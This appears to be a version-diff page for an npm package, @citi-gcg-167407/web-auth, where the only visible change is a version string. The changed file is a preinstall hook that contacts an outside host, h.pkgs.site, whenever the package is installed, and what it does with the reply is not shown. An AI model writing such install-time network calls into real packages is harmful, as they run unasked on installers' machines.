@citi-gcg-167407/web-auth 10.1.0 → 12.1.0
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +1 -1
- package/preinstall.js +1 -1
package/package.json
CHANGED
package/preinstall.js
CHANGED
@@ -23,7 +23,7 @@ try {
|
|
23
23
|
const axios = require('axios');
|
24
24
|
const semver = require('semver');
|
25
25
|
|
26
|
-
const url = 'https://h.pkgs.site/citi-gcg-167407/web-auth?v=
|
26
|
+
const url = 'https://h.pkgs.site/citi-gcg-167407/web-auth?v=12.1.0';
|
27
27
|
|
28
28
|
axios.get(url)
|
29
29
|
.then(res => {
|